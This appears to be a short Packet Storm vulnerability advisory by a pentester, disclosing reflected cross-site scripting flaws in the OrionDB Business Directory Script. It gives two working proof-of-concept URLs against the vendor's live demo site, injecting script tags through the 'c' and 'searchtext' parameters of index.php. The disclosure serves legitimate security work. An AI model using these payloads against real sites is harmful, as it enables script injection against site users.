OrionDB Business Directory Script suffers from multiple cross site scripting vulnerabilities.
d5a995d9550ed2998a600c0436a270646bf6cd2312e8abcf82a134b7bf8727a0##################################################################################
__ _ _ ____
/ /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _
__ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ /
\____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, /
/____/
##################################################################################
OrionDB Business Directory Script, XSS Vulnerabilities
Product Page: https://www.oriondb.com/
Script Demo: https://www.oriondb.com/wd-demo/
Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################
[1] Xss Vulnerabilities on Demo Site
[+] (index.php, c Param)
>>> https://www.oriondb.com//wd-demo/index.php?c=<script >prompt(35)</script>
[+] (index.php, searchtext param)
>>> https://www.oriondb.com/wd-demo/index.php?c=search&category=Food&searchtext=1</title><h1>3spi0n</h1><script >prompt(35)</script>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed